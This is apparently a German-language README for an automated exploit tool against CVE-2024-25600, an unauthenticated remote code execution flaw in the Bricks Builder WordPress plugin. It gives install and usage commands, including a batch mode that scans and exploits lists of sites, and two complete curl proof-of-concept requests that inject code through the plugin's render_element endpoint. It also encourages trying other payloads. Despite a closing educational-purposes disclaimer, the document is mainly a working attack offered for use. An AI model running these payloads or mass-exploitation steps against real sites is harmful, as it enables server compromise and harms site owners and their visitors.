
Automatisiertes Exploit-Tool für CVE-2024-25600, das nicht authentifizierte Remote-Codeausführung auf WordPress-Websites mit dem Bricks Builder Plugin ermöglicht. Unterstützt interaktive und Batch-Modi zur Befehlsausführung.
Dieses Tool 🛠️ wurde entwickelt, um die in dem Bricks Builder Plugin für WordPress gefundene Schwachstelle CVE-2024-25600 🕳️ auszunutzen. Die Schwachstelle ermöglicht eine nicht authentifizierte Remote-Codeausführung auf betroffenen Websites 💻. Das Tool automatisiert den Exploit-Prozess, indem es Nonces abruft und speziell gestaltete Anfragen sendet, um beliebige Befehle auszuführen.
git clone.pip install -r requirements.txt.python exploit.py -u <URL> aus, um den interaktiven Modus zu starten.python exploit.py -l <Dateipfad> aus, um die gelisteten Seiten zu scannen und zu exploiten.Der grundlegende PoC aus der Offenlegung lautet wie folgt:
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "container",
"settings": {
"hasLoop": "true",
"query": {
"useQueryEditor": true,
"queryEditor": "throw new Exception(`id`);",
"objectType": "post"
}
}
}
}'
Update: Zweiter PoC (zuverlässiger)
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "carousel",
"settings": {
"type": "posts",
"query": {
"useQueryEditor": true,
"queryEditor": "throw new Exception(`id`);",
"objectType": "post"
}
}
}
}'
Es ist möglich, dass zusätzliche Payloads bessere Ergebnisse liefern. Falls mein Exploit oder Proof of Concept bei dir nicht funktioniert, ermutige ich dich, mit alternativen Payloads zu experimentieren, um eine effektivere Lösung zu finden.
Ersetze [HOST] durch die Ziel-Website und [NONCE] durch den von der Website abgerufenen Nonce-Wert.
Für weitere Informationen über die Schwachstelle CVE-2024-25600 siehe bitte die detaillierte Offenlegung auf Snicco.io.
Die in dieser README bereitgestellten Informationen dienen ausschließlich zu Bildungszwecken. Nicht autorisiertes Hacken von Websites oder Netzwerken ist illegal und unethisch. 🚫
Lob an die Sicherheitsforscher, die diese Schwachstelle entdeckt und gemeldet haben, und der Community Informationen und Tools zur Verfügung gestellt haben, um ihre Webanwendungen zu sichern.